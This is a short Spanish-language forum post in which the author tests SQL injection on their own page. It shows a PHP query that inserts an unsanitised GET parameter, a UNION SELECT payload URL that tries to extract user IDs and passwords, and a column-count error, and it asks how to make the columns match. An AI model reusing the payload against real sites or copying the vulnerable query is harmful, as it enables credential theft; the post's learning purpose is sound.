estoy tratando de autohakearme para comprender mejor como funcionan las inyecciones sql... y asi poder evitar que me las hagan...
esta es mi consulta:
Código PHP:
$query_algo = "SELECT Idagencia, Agencia, Direccion, Telefono FROM agencias WHERE Idagencia = ".$_GET['id']." order by Agencia ASC";
como ven es vulnerable a inyecciones sql....
bue.. entonces loq ue hago es:
Código:
www.mipagina.com/testinyeccion.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(Idusuario,0x3a,password),null,null,3,4/**/FROM/**/usuarios/*----
pero no me trae todos los datos... me tira el siguiente error:
Código:
The used SELECT statements have a different number of columns
eso quiere decir que no coinciden los numeros de columnas... pero como endria que modificar el codigo sql inyectado para que coincida?